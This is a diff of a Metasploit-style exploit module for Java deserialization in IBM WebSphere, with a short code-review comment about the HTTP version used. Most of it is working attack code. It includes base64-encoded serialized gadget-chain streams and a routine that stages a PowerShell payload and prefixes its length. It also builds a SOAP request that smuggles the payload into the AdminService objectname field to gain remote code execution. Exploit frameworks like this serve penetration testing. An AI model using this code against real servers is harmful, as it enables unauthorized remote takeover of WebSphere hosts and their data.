modules/exploits/windows/misc/websphere_java_deserialize.rb

```diff
@@ -0,0 +1,116 @@
+      ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="
+
+      # Generate Payload
+      payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
+      payload_exec = Base64.strict_encode64(payload_exec)
+  end
+
+  def invoke_ccs(serialized_stream)
+      # Decode Serialized Streams
+      serialized_stream = Base64.decode64(serialized_stream)
+  end
+
+  def gen_payload
+      # Staging Native Payload
+      exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
+
+      # Size up RCE - Buffer
+      cmd_lng = exec_cmd.length
+      lng2str = "0" + cmd_lng.to_s(16)
+      buff = [lng2str].pack("H*")
+
+      rce_pld = buff + exec_cmd
+  end
+
+  def soap_request(inject_payload)
+      # SOAP Request
+      req = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
+      req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n"
+      req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n"
+      req += "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n"
+      req += "</SOAP-ENV:Header>" + "\r\n"
+      req += "<SOAP-ENV:Body>" + "\r\n"
+      req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n"
+      req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>" + "\r\n"
+      req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n"
+      req += "</ns1:getAttribute>" + "\r\n"
+      req += "</SOAP-ENV:Body>" + "\r\n"
+      req += "</SOAP-ENV:Envelope>" + "\r\n"
+
+      uri = target_uri.path
+
+      res = send_request_raw({
+          'method'      => 'POST',
+          'version'     => '1.1',
```

Comment:
It's not. `Version 1.0` it's also supported and in order to avoid any unwanted actions due to to VHOST option I applied it on the request.